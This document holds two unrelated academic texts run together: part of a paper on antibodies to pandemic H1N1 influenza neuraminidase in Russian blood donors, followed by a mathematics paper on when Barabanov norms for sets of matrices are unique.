HI test with blood sera was performed using a 0.75% suspension of human red blood cells (Group "0") in "U"-bottom 96-well polymer plates for immunological reactions using standard procedures [18].To remove thermo-labile inhibitors, the sera were heated at 56˚C for 30 min.To remove thermo-stable hemagglutination inhibitors, the studied sera were treated with an extract of Vibrio cholerae NA (Denka Seiken Co., Japan), and tested in duplicate for HI antibodies with the following test antigens: A/South Africa/3626/13 (H1N1)pdm, A/California/07/ 2009 (H1N1)pdm, A/New Caledonia/20/99 (H1N1), and A/Puerto Rico/8/34 (H1N1).The titers of HI antibodies were expressed as the reciprocal of the highest serum dilution at which HI was observed.
The production of anti-NA antibodies against A/California/07/2009 (H1N1)pdm and A/ South Africa/3626/13 (H1N1)pdm was evaluated in the sialidase activity inhibition test [19] using the A/H7N1 and A/H6N1 reassortant viruses described above after purification and concentration on a stepwise 30/60% sucrose gradient.To assay anti-NI antibodies, 96-well plates (Sarstedt AG & Co, Germany) were coated overnight with 150 μL of 50 μg/mL fetuin (Sigma-Aldrich, USA).The purified A/H7N1 or A/H6N1 reassortants were adjusted in phosphatebuffered saline (PBS) containing 1% bovine serum albumin (BSA) to obtain 128 hemagglutination units (HAU) and yielded 0.4-0.6 optical density at 450 nm (OD 450 ).65 μL of sera samples were heated at 56˚C for 30 min, serially diluted in PBS-BSA, and incubated with an equal volume of pre-diluted virus for 30 min at 37˚C.After incubation, 100 μL of the mixture was added to the fetuin-coated wells.After 1 h incubation at 37˚C, the plates were washed, and NA activity was measured by incubating with peroxidase-labeled peanut lectin (2.5 μg/mL, Sigma-Aldrich, USA) for 1 h at room temperature followed by washing and adding 100 μL of peroxidase substrate.The reaction was stopped after 5 min with 100 μL of 1 N sulfuric acid.OD values were measured at 450 nm using the universal microplate reader (ELx800, Bio-Tek Instruments Inc, USA).The titer of serum NI antibodies was calculated as the reciprocal dilution of the sample with 50% inhibition of NA activity, i.e. two-fold decrease in optical density in comparison with the virus control wells.
Determination of neutralizing antibodies against A/South Africa/3626/13 (H1N1)pdm was carried out using the microneutralization (MN) test in the Madin-Darby canine kidney (MDCK) cells with no-RDE-treated sera as described previously [18].
Statistical analysis
Data were analyzed using Statistica software, version 6.0 (StatSoft Inc., USA).The antibody titers were expressed as log2 of the inversed final dilution for statistical analysis.Geometric mean titers (GMT), medians (Me) and lower and upper quartiles (Q1; Q3) were calculated and used to represent the antibody levels.Comparisons of two independent groups were made with nonparametric Kolmogorov-Smirnov 2-sample test.To compare multiple independent groups, we used a Kruskal-Wallis analysis of variance (ANOVA) with subsequent multiple pairwise comparisons based on Kruskal-Wallis sums of ranks.Comparisons of two dependent variables were performed using Wilcoxon matched pairs test.Fisher exact 2-tailed test was performed in case of nominal variables.Non-parametric measure of statistical dependence between 2 variables was done using Spearman's rank correlation coefficient (r).The P-value < 0.05 was considered to be statistically significant.
Analysis of NA amino acid sequences of A/H1N1 viruses
We used a distance method of proximity for the reconstruction of NA phylogenetic trees.Based on the initial alignment we evaluated the stability of the tree topology using bootstrap analysis using the results of the construction and comparison of phylogenetic trees generated for 1,000 sets of NA amino acid sequences.Our phylogenetic analysis of N1 amino acid sequences demonstrated that the NA of A/California/07/09 (H1N1)pdm as well as the NA of other viruses isolated after 2009 in North America and Asia exhibited similarity to the phylogenetic branch of the swine viruses of the Euro-Asian lineage isolated in 2004 (Fig 1A).NA sequences of recent epidemic A/H1N1 viruses were more closely related to A/ H1N1 strains isolated in 1918 and 1943 compared with the A/H1N1pdm09 isolates.The NAs of A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm were 98% identical and differed only by 10 amino acid substitutions, I34V, L40I, N44S, T135A, N200S, V241I, N248D, I321V, N369K, K432E (N1 numbering here and throughout the text), which do not alter NA polarity and/or charge.Mutations at residues 34, 40, and 44 were located in the NA stem, whereas the rest were located in the head domain outside the active center (Fig 1B) [20].
We next determined NA activities of A/California/07/09 (H1N1)pdm and A/South Africa/ 3626/13 (H1N1)pdm viruses by measuring NA enzyme K m and V max values for both A/ H1N1pdm09 strains and by using the fluorogenic MUNANA as a substrate (Fig 1C and Table 1).Our data showed that NA protein of A/South Africa/3626/13 (H1N1)pdm exhibited significantly higher affinity for the substrate (mean K m , 2.3-fold) than A/California/07/09 (H1N1)pdm NA (P < 0.05).Furthermore, NA enzyme activity of A/South Africa/3626/13 (H1N1)pdm was significantly higher compared to that of A/California/07/09 (H1N1)pdm (V max ratio = 1.6;Fig 1C and Table 1).Surprisingly, a number of subjects with HI antibody titers !1:40 against A/California/07/09 (H1N1)pdm (i.e., level that is traditionally associated with at least a 50% reduction in the risk of disease due to influenza infection) was significantly lower among volunteers examined in 2016 compared to 2010 (P = 0.047).These results may suggest decreased circulation of A/ H1N1pdm09 in 2016 compared to 2010.
Detection of HI and NI antibodies against A/South Africa/3626/13 (H1N1) pdm and A/California/07/09 (H1N1)pdm in 134 blood donors examined during the 2015-2016 epidemic season
The antibody levels against HA and NA of A/H1N1pdm09 viruses were examined among 134 patients of Medical Research Center.Since the examined subjects did not receive vaccination against A/H1N1pdm09, it was assumed that the antibodies to surface antigens of A/ H1N1pdm09 viruses were acquired due to natural infection.Among all these subjects was obtained statistically significant differences between HI antibody levels to A/South Africa/ 3626/13 (H1N1)pdm in participants with influenza-like illnesses (ILI) compared with those with no ILI (P = 0.0014, Fig 3A).With respect to A/California/07/09 (H1N1)pdm these differences were not statistically significant (P = 0.058).These data may suggest that the drift A/ H1N1pdm09 variant, presumably A/South Africa/3626/13-like, has already circulated in St. Petersburg along with A/California/07/09 (H1N1)pdm during the period of the study.As seen in Fig 3B, among all 134 volunteers 24-84 years of age, the majority of participants had HI antibody titers <1:40 against A/South Africa/3626/13 (H1N1)pdm and A/California/ 07/09 (H1N1)pdm.We observed similar proportions of subjects possessing HI antibody titers !1:40 against A/South Africa/3626/13 (H1N1)pdm and A/California/07/09 (H1N1)pdm (5.2% and 9.7%; P > 0.05).Contrary data were obtained for NI antibodies: the NI antibody titers !1:40 against A/California/07/09 (H1N1)pdm were found in 33.6% of participants, whereas only 2.2% of subjects demonstrated such NI antibodies levels against A/South Africa/ 3626/13 (H1N1)pdm (P < 0.0001).The correlation between NI antibody titers against A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm among 134 blood donors was established as a link of medium strength: only 19.1% of the ranks variability in one variable can be explained using the ranks of another variable (r = 0.437, n = 134, P < 0.05, Fig 3C).The NI antibody titers against A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm better correlated (r = 0.640; n = 49; P < 0.0001) in the sera of the patients seropositive to A/H1N1pdm viruses (Fig 3D) The low NI antibody titers against A/South Africa/3626/13 (H1N1)pdm and high NI antibody titers against A/California/07/09 (H1N1)pdm may suggest that the drift variant A/South Africa/3626/13 (H1N1)pdm only started circulating in 2016.This finding may also indicate that antibodies against A/South Africa/3626/13 (H1N1)pdm NA found in the blood donors could result from direct infection with a new antigenic A/H1N1pdm09 variant rather than from cross-reaction as a result of contact with previously circulating seasonal A/H1N1 variants.Thus, antibody levels against A/South Africa/3626/13 (H1N1)pdm NA were significantly lower than against A/California/07/09 (H1N1)pdm NA among the 48 participants negative to HA of A/H1N1pdm09 viruses but positive to A/New Caledonia/20/99 (H1N1) or A/Puerto Rico/8/34 (H1N1) (P < 0.0001; Fig 4A) which HA amino-acid sequences differ more than 15% from A/California/07/09 (H1N1)pdm and A/South Africa/13 (Fig 4B).Since these patients did not possessed antibodies against HA of A/H1N1pdm09 viruses, it is likely that the detected antibodies to HA of previously circulated A/H1N1 viruses could be the result of antigenic 'sin'.Despite the NA amino-acid sequences of A/South Africa/3626/13 (H1N1)pdm and A/California/07/09 (H1N1)pdm were very similar (Fig 1A ), the levels of "herd" immunity against NA of A/H1N1pdm09 viruses in these patients varied significantly: NI antibody titers !1:40 were detected in 29.1% against A/California/07/09 (H1N1)pdm and were not found against A/South Africa/3626/13 (H1N1)pdm (P<0.01).
Comparative analysis of the antibodies against A/H1N1 in patients of different ages
The age distribution of A/H1N1-specific antibodies was analyzed in several participant age groups: subjects born prior to 1957, when only A/H1N1 viruses were circulating; subjects born between 1957-1976 when A/H2N2 and A/H3N2 viruses were circulating, and subjects born in 1977 and later, when A/H1N1 re-emerged and began co-circulating along with A/H3N2 (Table 2).
The highest levels of anti-HA antibodies against seasonal A/New Caledonia/20/99 (H1N1) and both A/H1N1pdm09 viruses were detected in the 24-39 age group compared to elder people (P = 0.023).Participants between 60-84 years of age demonstrated the lowest level of HI antibodies against A/New Caledonia/20/99 (H1N1), slightly increased HI titers against A/ Puerto Rico/8/34 (H1N1) and the highest NI antibody titers against A/California/07/09 (H1N1)pdm compared with other groups (P < 0.0001) (Table 2).Our data confirm earlier findings that older people, who had been in contact with A/H1N1 viruses that have not been in circulation for a long time, may demonstrate antigenic "sin" when infected with recent viruses [21,22].In this case, the priming antibodies are formed not only to the infecting virus but also to the previous variants.However, the question of the protective role of these antibodies still remains unclear.On one hand, the presence of such antibodies can make a definite contribution to the protection against infection with a new antigenic variant [23].On the other hand, there is evidence that pre-existing antibodies to previously circulating variants may somehow prevent the development of protective antibodies in infection with the new antigenic variants [24].
The lowest levels of NI antibodies against A/California/07/09 (H1N1)pdm and no NI antibodies against A/South Africa/3626/13 (H1N1)pdm were found in people 40-59 years old who were born from 1956 to 1976, when the H2N2 and H3N2 viruses were in circulation (Table 2).
Analysis of sera samples from the convalescents
We included the 15 paired sera from the patients with laboratory-confirmed A/H1N1pdm09 infection.We observed that mean HI and NI antibody titers against A/California/07/09 (H1N1)pdm were significantly higher on days 4-7 after the onset of symptoms compared to those on date of onset (P = 0.01, P = 0.015, respectively) (Fig 5A).HI and NI antibody titers against A/South Africa/3626/13 (H1N1)pdm increased as the disease progressed (P = 0.02, P = 0.043).Seven of 15 participants (46%) had the !4-fold HI antibody increase either against A/California/07/09 (H1N1)pdm or A/South Africa/3626/13 (H1N1)pdm with 6 participants responding simultaneously to both viruses.Sera collected from 5 participants with increased post-infection NI antibodies >1:40 reacted with A/South Africa/3626/13 (H1N1)pdm in the HI test.
Because the virus neutralization by antibodies in vitro often reflects the biological effect of protective antibodies and the MN test is known to correlate well with the HI assay [25], we compared results of HI and NI titers with the MN antibody titers determined when A/South Africa/3626/13 (H1N1)pdm was used as an antigen.A strong relationship was found between neutralizing antibody titers and HI antibody titers against A/South Africa/3626/13 (H1N1) pdm (r = 0.705, n = 30, P < 0.0001), whereas a medium relationship was found between neutralizing antibody titers and NI antibodies against A/South Africa/3626/13 (H1N1)pdm (r = 0.579, P < 0.0001) as determined by Pearson correlation test (Fig 5B and 5C).A medium relationship was observed between neutralizing antibody titers against A/South Africa/3626/ 13 (H1N1)pdm and HI antibody titers against A/California/07/09 (H1N1)pdm (r = 0.670, n = 30, P < 0.0001) as well as between MN antibody titers against A/South Africa/3626/13 (H1N1)pdm and NI antibody titers against A/California/07/09 (H1N1)pdm (r = 0.647, n = 30, P < 0.0001) (Fig 5D and 5E).These data suggest that anti-NA antibodies may be virus-neutralizing along with anti-hemagglutinating antibodies.
Discussion
Our data suggested that a small number of patients examined in the present study may have been infected with A/South Africa/3626/13-like influenza viruses by March 2016 and this resulted in the induction of homologous HI and NI antibodies.Contact with previously circulated A/H1N1 viruses did not induce cross-reactive NI antibodies against A/South Africa/ 3626/13 (H1N1)pdm, but induced NI antibodies cross-reactive with A/California/07/09 (H1N1)pdm.Our survey revealed a low level of detectable NI antibodies against new antigenic A/H1N1pdm09 variant (5.2%), especially in light of the fact that pandemic viruses have been circulating in Russia for more than 6 years.As it was shown in our previous work [26], even in 2005, i.e. long before the appearance of A/H1N1pdm09 in humans, the level of cross-reactive antibodies against A/California/07/09 (H1N1)pdm NA with titers !1:20 was 7.1%, and after the introduction of the virus into circulation it increased up to 30% and later up to 53% in 2016.The levels of "herd" immunity against NA, as determined by the number of subjects with NI antibody titers !1:40 against the A/South Africa/3626/13 (H1N1)pdm were low compared to those against A/California/07/09 (H1N1)pdm (Fig 3B).One explanation of these results could be antigenic differences between NAs of the two pandemic viruses.As previously reported, even a single amino acid change within an immunodominant epitope may lead to loss of reactivity with polyclonal antisera [27].For example, introduction of a single NA amino acid change in A/Solomon Islands/3/2006 strain at position 329 resulted in reduced enzyme inhibition by ferret and human sera directed against this virus [28].The amino acid sequences of the A/California/07/09 (H1N1)pdm NA and A/South Africa/3626/13 (H1N1)pdm NA differed by 2% and 7 substitutions were located in the head domain, outside the active center.
The substitutions N372K and K432E were located in the portion from the second binding site, commonly found in N6 and N9 avian influenza viruses [29].When MUNANA was used as a substrate, A/California/07/09 (H1N1)pdm NA exhibited significantly decreased NA activity compared to that of A/South Africa/3626/13 (H1N1)pdm (Fig 1C, Table 1).These results may suggest that there is interplay between enzyme activity and antigenicity of N1 NA protein.Our finding may also explain the ineffective inhibition of A/South Africa/3626/13 (H1N1)pdm NA by cross-reactive NI antibodies induced against previously circulated A/H1N1 viruses, including A/California/07/09 (H1N1)pdm.
Previously it has been reported that anti-HA stalk monoclonal antibodies bind to H6 HA reducing the NA activity of the reassortant H6NX viruses through steric interactions [22] thus affecting the results of the NI reaction.Despite the fact that we used A/H6N1 reassortant virus in one case and A/H7N1 in the other case to NI test, the data can still be comparable since the HA stalk domain is highly conservative [30].We assume that the difference in NI antibody levels against A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm in the population as a whole can be attributed to the presence of cross-reactive, rather than homologous, antibodies to a drift A/H1N1pdm09 variant.This was confirmed by the data from the A/ H1N1pdm-positive patients, when the correlation between NI antibody levels against A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm were more pronounced compared to the population at a whole (Fig 3D).Analyzing the sera of patients soon after the influenza infection we showed that the immune responses to both influenza surface antigens were induced simultaneously right after natural infection with A/H1N1pdm09 viruses (Fig 5A and 5B).Some autonomy of the HI and NI immune responses among those subjects who have been exposed to the virus in the past may be related to the timing of the material sampling, particularly when detecting anti-NA antibodies.
Influenza infection represents a particular risk of complications and increased mortality in the elderly.The disease is characterized by a combination of inflammatory changes in the upper respiratory tract with general intoxication and damage to the nervous and cardiovascular systems, thus causing severe complications when developed against the background of atherosclerotic changes in the cardiovascular system and other chronic conditions [31].In a number of previous studies, the NI antibody titers against A/H1N1pdm09 were detected in the sera of older individuals [32], possibly explaining the reported low incidence of A/ H1N1pdm09 disease in the elderly [33].Indeed, the importance of NA immunity against naturally occurring influenza was demonstrated by evaluating HI and NI antibody titers in a study conducted during 2009-2011 [34] when increased serum NI titers were associated with reduced illnesses.Elderly individuals who were likely exposed to 1918 Spanish Flu pandemic had high neutralizing titers against A/H1N1pdm09 [21] and were more likely to possess crossreactive antibodies against A/H1N1pdm09 N1 NA.In the present study, we did not observe significant difference in HI and NI antibody levels against A/South Africa/3626/13 (H1N1) pdm among individuals born before 1957 compared to the younger subjects.In contrast, the highest levels of NI antibodies against A/California/07/09 (H1N1)pdm were found in the older age group compared to other groups studied.Thus, the highest levels of NI antibodies against A/California/07/09 (H1N1)pdm may be attributed to cross-reactive antibodies against A/ H1N1 viruses other than A/H1N1pdm09.A group of middle-aged patients with the lowest level of NI antibodies against a new antigenic A/H1N1pdm09 variant was identified, indicating the highest-priority vaccination against new antigenic variants.
Fig 1 .
Fig 1. Analysis of N1 NA proteins.(A) Phylogenetic analysis of NAs originating from different A/H1N1 viruses isolated from human and swine (AA 1-469).Phylogenetic analysis of amino acid sequences of NAs originating from different A/H1N1 viruses isolated from human and swine (AA 1-469).The sequences were obtained from The NCBI Influenza Virus Sequence Database.Numbers of bootstrapping trees next to each node represent a measure of support for the node.(B) Three-dimensional model of the NA "head" (AA 83-469) was created using Cn3D software.Seven amino acid substitutions that differ in the NA head domain of A/ California/07/09 (H1N1)pdm compared to A/South Africa/3626/13 (H1N1)pdm are shown in purple.(C) NA enzyme kinetics of A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm viruses.Substrate conversion velocity (V i ) of NA was measured as a function of substrate concentration.https://doi.org/10.1371/journal.pone.0196771.g001 Comparison of "herd" immunity againstA/California/07/09 (H1N1)pdm in 2010-2011 and 2015-2016 epidemic seasons We compared the HI and NI antibody levels against A/California/07/09 (H1N1)pdm in the sera collected from adult volunteers between 20-59 years of age.The sera were collected in October 2010 (n = 42) and in January-March 2016 (n = 47).ANOVA test showed no difference in age distribution of the participants between both groups (P > 0.05).As seen in Fig 2, the proportions of with NI antibody titers <1:40 and !1:40 were similar between volunteers examined in 2010 (i.e., one year after A/H1N1pdm09 emerged) and in 2016 (i.e., after 6 years of A/H1N1pdm09 circulation).
Table 1 . Enzymatic properties of A/H1N1pdm09 NAs. Viruses V max (μM/min) a K m (μM) b
The V max was calculated using a nonlinear regression of the curve according to the Michaelis-Menten equation.bTheK m represents the Michaelis-Menten constant (μM) at which the reaction rate is half of V max .The enzyme kinetic data were fit to the Michaelis-Menten equation using GraphPad Prism, version 6.0.Values are the means ± standard deviations from three independent determinations. | 2018-05-11T22:37:44.601Z | 2018-05-09T00:00:00.000 | {
"year": 2018,
"sha1": "0940fb6432efbb5084796a31a6c9901399ae3e8f",
"oa_license": "CC0",
"oa_url": "https://journals.plos.org/plosone/article/file?id=10.1371/journal.pone.0196771&type=printable",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "0940fb6432efbb5084796a31a6c9901399ae3e8f",
"s2fieldsofstudy": [
"Biology",
"Medicine"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
42087097 | pes2o/s2orc | v3-fos-license | A new sufficient condition for the uniqueness of Barabanov norms
The joint spectral radius of a bounded set of d times d real or complex matrices is defined to be the maximum exponential rate of growth of products of matrices drawn from that set. Under quite mild conditions such a set of matrices admits an associated vector norm, called a Barabanov norm, which can be used to characterise those sequences of matrices which achieve this maximum rate of exponential growth. In this note we continue an earlier investigation into the problem of determining when the Barabanov norm associated to such a set of matrices is unique. We give a new sufficient condition for this uniqueness, and provide some examples in which our condition applies. We also give a theoretical application which shows that the property of having a unique Barabanov norm can in some cases be highly sensitive to small perturbations of the set of matrices.
Introduction
Given a bounded set A of d × d matrices over R or C, the joint spectral radius of A is defined to be the quantity a definition introduced by G.-C. Rota and G. Strang in 1960 ([18], subsequently reprinted in [17]). This limit always exists and is independent of the norm used (for a proof see e.g. [11]). The joint spectral radius has subsequently been found to arise in a range of mathematical contexts including control and optimisation [2,5,9], wavelet regularity [7], coding theory [15], and combinatorics [3]. As such, the properties of the joint spectral radius are the subject of ongoing research investigation (see for example [1,4,5,6,8,10,14]). This note is concerned with a theoretical tool associated to the joint spectral radius called the Barabanov norm, which we now define.
Let us say that a set A of d×d real or complex matrices is reducible if its elements simultaneously preserve a linear subspace with dimension strictly between 0 and d. If A is not reducible then it will be called irreducible. An irreducible set of matrices always has nonzero joint spectral radius (see e.g. [11]). In the article [2], N. E. Barabanov showed that to any compact irreducible set A of d × d matrices over R or C, one may associate a norm ||| · ||| on R d or C d such that the Bellman-like equation is satisfied for every vector v. We shall call a norm which satisfies this relation for every v a Barabanov norm for A. Given any vector v, by iterating the above relation it follows that for each n ≥ 1, and since A is assumed to be compact, it follows that we may extract a sequence (A ij ) ∞ j=1 of elements of A such that |||A in · · · A i1 v||| = ̺(A) n |||v||| for every n ≥ 1. As various researchers have noted (see e.g. [11,12,19]), Barabanov norms thus implicitly encode a description of certain sequences of matrices drawn from A whose partial products grow at the maximum possible exponential rate. The problem of constructing or approximating a Barabanov norm for a given set of matrices has consequently attracted some recent research interest [13,14,16,19]. In this note we continue an investigation initiated in [16] into the closely related question of determing when Barabanov norms are unique. Clearly if a given norm satisfies (1.1), then any positive scalar multiple of that norm will also satisfy (1.1), so when saying that a set of matrices has a "unique" Barbanov norm, we shall always mean only that any two Barabanov norms for that set must be proportional to one another by a scalar constant.
In the earlier article [16] we established a sufficient condition for a finite irreducible set A = {A 1 , . . . , A m } of d × d matrices over R or C to have a unique Barabanov norm in the sense defined above. We showed that if A has both the rank one property and the unbounded agreements property, defined formally in the next section, then a unique Barabanov norm for A exists. Roughly speaking, the unbounded agreements property states that there are not "too many" sequences (A ij ) ∞ j=1 ∈ A N such that the sequence of products ̺(A) −n A in · · · A i1 does not converge to zero in the limit as n → ∞, while the rank one property states that for any fixed sequence of matrices, the vector space of all vectors v such that ̺(A) −n A in · · · A i1 v converges to zero has the largest possible dimension. In this note we establish a new sufficient condition for the uniqueness of Barabanov norms which is complementary to the sufficient condition given in [16], and which applies in certain situations where there is instead a large supply of sequences (A ij ) and vectors v such that ̺(A) −n A in · · · A i1 v does not converge to zero. The new condition may also be applied to compact infinite sets of matrices. As direct examples of the application of the theorem, we exhibit firstly a pair of matrices which has a unique Barabanov norm but satisfies neither the rank one property nor the unbounded agreements property (hence not falling within the scope of [16]), and secondly a countably infinite compact set of matrices which has a unique Barabanov norm, but such that every finite subset thereof has an uncountable family of Barabanov norms which are not proportional to one another.
We also use the main theorem in this note to investigate the robustness with respect to perturbation of the property of having a unique Barabanov norm. It was shown in [16] that for every pair of integers r, d ≥ 2, and for K equal to either R or C, there exists an r-tuple of d × d matrices over K such that every sufficiently small perturbation of that r-tuple also has a unique Barbanov norm. As an application of our main theorem, we show that there exists a pair of real 2 × 2 matrices A with the following contrasting property: pairs of matrices having a unique Barbanov norm, and pairs of matrices not having a unique Barabanov norm, both form dense sets in a small open neighbourhood of A. The property of having a unique Barabanov norm is thus shown to be highly sensitive to small perturbations of the set of matrices in certain cases.
Statement and proof of main theorem
Throughout the rest of this note we use the symbol K as a shorthand to denote either R or C. Statements which are given in terms of K are thus valid if either of these two fields is consistently chosen. We use the symbol M d (K) to denote the set of all d × d matrices over K, which we equip with its usual topology as a normed vector space. The symbol · will be used to denote the Euclidean norm on K d , and also the corresponding induced matrix norm on M d (K). The symbol ρ(B) will be used to denote the ordinary spectral radius of the matrix B.
If A is a compact subset of M d (K) and n ≥ 1 is an integer, we define and A is relatively product bounded, see for example [11]. If A ⊂ M d (K) is relatively product bounded, then following F. Wirth in [20] we define the limit semigroup of A to be the set We may now give the formal definition of the rank one property and the unbounded agreements property mentioned in the introduction. We say that A has the rank one property if it is relatively product bounded and every nonzero element of S(A) is of rank one. The finite set of matrices A = {1, . . . , m} has the unbounded agreements property if for every pair of sequences j 1 , j 2 : N → {1, . . . , m} such that lim sup n→∞ ̺(A) −n A ji(n) · · · A ji(1) > 0 for i = 1, 2, and every integer ℓ ≥ 1, there exist k 1 , k 2 ≥ 0 such that j 1 (k 1 + t) = j 2 (k 2 + t) for all t in the range 1 ≤ t ≤ ℓ. (We do not define the unbounded agreements property for infinite sets of matrices.) The central result of this note is the following sufficient condition for the uniqueness of the Barabanov norm: Theorem 2.1. Let A be a bounded, irreducible nonempty subset of M d (K) such that the limit semigroup S(A) has the following transitivity property: for every pair of nonzero vectors v 1 , v 2 ∈ K d , there exist B 1 , B 2 ∈ S(A) and λ ∈ K such that Barabanov norm. Proof. Since A is irreducible, it admits at least one Barabanov norm. Fix a nonzero vector v 0 ∈ K d for the remainder of the proof, and suppose that ||| · ||| 1 and ||| · ||| 2 are both Barabanov norms for A which give norm 1 to the vector v 0 . To prove the theorem it is necessary and sufficient to show that ||| · ||| 1 must be equal to ||| · ||| 2 .
Remark. When K = R, the most straightforward case in which Theorem 2.1 may be applied is that in which S(A) contains the special orthogonal group SO(d), or more generally, when S(A) is simultaneously similar to a semigroup which contains SO(d). In particular, if ̺(A) −1 A contains a collection of matrices which generate a dense subsemigroup of SO(d) (or which are simultaneously similar to a such a collection) then Theorem 2.1 may be applied and A has a unique Barabanov norm. Similar remarks apply to the case K = C and the group SU (d). However, these cases certainly do not exhaust the possibilities of the theorem: for example, if A consists precisely of the set of rank one orthogonal projections on R 2 , then S(A) contains every real matrix which is equal to the composition of a rotation and an orthogonal projection, and Theorem 2.1 also applies. Higher-dimensional examples of this type may of course also be constructed. In any case, Theorem 2.1 is powerful enough to produce some interesting applications, which we describe in the following two sections. Proof. Let us first establish the properties of A for general θ ∈ R \ Z. Since θ / ∈ Z the matrix A 2 does not preserve any one-dimensional subspace of R 2 , and therefore A is irreducible. It is straightforward to see that max{ A : A ∈ A n } = 1 for every n ≥ 1 and consequently ̺(A) = 1. In particular A is product bounded. Every accumulation point at infinity of the sequence (A n 2 ) ∞ n=1 has rank two, and so A does not have the rank one property. Since lim n→∞ A n i = 1 for both i = 1 and i = 2 the unbounded agreements property is also not satisfied.
Examples
Let us now consider those properties which depend on whether or not θ ∈ Q. If θ / ∈ Q then every rotation matrix in M 2 (R) is an accumulation point of (A n 2 ) ∞ n=1 , and so S(A) contains the group of rotation matrices. It follows easily that A meets the hypotheses of Theorem 2.1 and has a unique Barabanov norm. Conversely, let us suppose that θ ∈ Q. Let ||| · ||| be any norm whose unit ball is invariant under rotation through angle θπ and such that |||(x, 0) T ||| ≤ |||(x, y) T ||| for all x, y ∈ R. The former property ensures that |||A 2 v||| = |||v||| = ̺(A)|||v||| for every v ∈ R 2 , and the latter property ensures that |||A 1 v||| ≤ |||v||| = ̺(A)|||v||| for every v, so in particular any such norm is Barabanov. If K ⊂ R 2 is a compact convex set with nonempty interior which is symmetrical with respect to rotation about the origin through angles θπ and π, and such that there exists a vertical tangent to K at all of its boundary points which lie on the horizontal axis, then K is the unit ball of a norm which has the required properties. It is clear that uncountably many such sets exist which are not related to one another by scalar multiplication, and we conclude that A has uncountably many Barabanov norms.
The following example shows that the uniqueness of Barbanov norms can be a quite delicate phenomenon: Example 2. Let us define a compact subset of M 2 (R) by Then every nonempty subset of A has joint spectral radius equal to one, is product bounded, and does not have the rank one property. Every subset of A with at least two elements is irreducible, and finite subsets of A which have at least two elements do not satisfy the unbounded agreements propery. Every infinite subset of A has a unique Barabanov norm, but every finite nonempty subset of A has uncountably many Barabanov norms.
Proof. Let B ⊆ A be a nonempty subset. It is clear that sup{ B : B ∈ B n } = 1 for all n ≥ 1 so that ̺(B) = 1 and B is product bounded, and it is also clear that S(B) contains the identity matrix so that the rank one property is not satisfied. If B has at least two elements then it includes a rotation matrix with no real eigenvalues, and hence B is irreducible. Since lim n→∞ B n = 1 for every B ∈ B, the unbounded agreements property is not satisfied when B is finite and contains at least two elements. Since every element of B preserves the Euclidean norm, that norm is a Barabanov norm for B.
Let us now consider the uniqueness or otherwise of Barabanov norms for B. Suppose first that B is infinite. In this case there exist infinitely many positive integers q such that B includes the matrix of rotation through angle π/2 q . If q is such an integer, then in particular it follows that S(B) contains the group of all rotations through angles of the form kπ/2 q . Since q may be taken arbitrarily large it follows that S(B) contains every rotation by a dyadic rational multiple of π, and since S(B) is closed we conclude that SO(2) ⊆ S(B). Theorem 2.1 therefore applies and the Euclidean norm is the unique Barbanov norm of B. Now let us suppose that B ⊂ A is finite and nonempty. If B consists only of the identity matrix then every norm on R 2 is preserved by B and hence is Barabanov. Otherwise, let n be the largest integer such that B contains the matrix corresponding to rotation through angle π/2 n . If K ⊂ R 2 is a compact convex set with nonempty interior which is invariant under rotation through angle π/2 n , then it is invariant under the action of every element of B. To each such K there corresponds a norm on R 2 which has K as its unit ball, hence is invariant under every element of B and therefore is Barabanov. Since there exist uncountably many compact convex sets K which are invariant under rotation through angle π/2 n and are not pairwise similar, we conclude that B has uncountably many Barabanov norms.
A theoretical application
Following the notation of [16], let us use the symbol O 2 (R 2 ) to denote the set of all ordered pairs of 2 × 2 real matrices, which we equip with the topology arising from the natural identification of this space with M 2 (R) ⊕ M 2 (R). In [16] we showed that O 2 (R 2 ) contains a nonempty open set U with the property that for every (A 1 , A 2 ) ∈ U, the set A = {A 1 , A 2 } has a unique Barabanov norm. For matrix pairs belonging to U, therefore, the property of having a unique Barabanov norm is robust with respect to sufficiently small perturbations of either or both of the matrices comprising the pair. This result naturally leads one to ask whether this phenomenon is typical: is the set of all ( Proof. Let A 2 be a rotation matrix which does not have real eigenvalues, and let A 1 be any matrix such that A 1 < A 2 = 1. We will take V to be a suitably small neighbourhood of (A 1 , A 2 ).
For each δ > 0 let B δ denote the open ball about the origin in M 2 (R) which has radius δ with respect to the spectral norm. Since the eigenvalues of A 2 are simple, we may choose ε > 0 small enough that there exist continuous functions E : B ε → C, V : B ε → C 2 such that for all C ∈ B ε , E(C) is a strictly complex eigenvalue of the real matrix A 2 + C with corresponding complex eigenvector V (C). Since A 2 +C is real, the complex conjugates of E(C) and V (C) are also an eigenvalue and an eigenvector respectively. Since E(C) is strictly complex it is not equal to E(C), and consequently the associated eigenvectors V (C) and V (C) are linearly independent over C. It follows from this that the real and imaginary parts of V (C) are a linearly independent pair of vectors with respect to R. For each C ∈ B ε let us now define S(C) to be the invertible real matrix with first column given by ℑ(V (C)) and second column given by ℜ (V (C)). An elementary calculation shows that S(C) −1 (A 2 + C)S(C) is precisely the real matrix of rotation through angle arg E(C) multiplied by the positive scalar factor |E(C)| = ρ(A 2 + C). For each C ∈ B ε define a norm · C on R 2 by v C := S(C) −1 v for every v ∈ R 2 . It is easily seen that ρ(A 2 + C) −1 (A 2 + C) is an isometry of R 2 with respect to this norm, and in particular A 2 + C C = ρ(A 2 + C). Since A 2 is a rotation matrix, a direct calculation shows that S(0) is proportional to the identity and therefore · 0 is a scalar multiple of the Euclidean norm on R 2 . Let us now define Clearly V contains (A 1 , A 2 ), and since S : B ε → M 2 (R) is continuous, V is open. We claim that (B 1 , B 2 ) ∈ V has a unique Barabanov norm if and only if the eigenvalues of ρ(B 2 ) −1 B 2 are not roots of unity. An easy perturbation argument shows that pairs (B 1 , B 2 ) ∈ V such that the eigenvalues of B 2 have irrational arguments, and pairs such that the eigenvalues of B 2 have rational arguments, are both dense in V. It follows that establishing this claim is sufficient to complete the proof of the theorem.
